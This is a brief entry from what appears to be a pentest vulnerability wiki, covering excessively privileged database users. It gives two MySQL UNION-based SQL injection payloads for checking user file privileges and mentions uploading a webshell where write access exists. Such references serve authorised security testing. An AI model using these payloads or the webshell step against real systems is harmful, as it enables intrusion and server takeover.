Cobalt Crowdsourced Application PentestCobalt Crowdsourced Application PentestCobalt Crowdsourced Application Pentest

Cobalt Vulnerability Wiki


V4 - Access Control

Database Management System (DBMS) Misconfiguration:Excessively Privileged User / DBA

POC

  • After exploiting SQL injection vulnerability, check with the following commands for MYSQL to see the current permissions of the user ' UNION SELECT 1,2,3,4,user(),6 -- - ' UNION SELECT 1,2,3,4,GROUPCONCAT(user," : ",filepriv,"\n"),6 FROM mysql.user WHERE FILE_PRIV='Y'-- -
  • See if the user has write permissions so that you can upload a webshell

Impact

High

Likelihood

High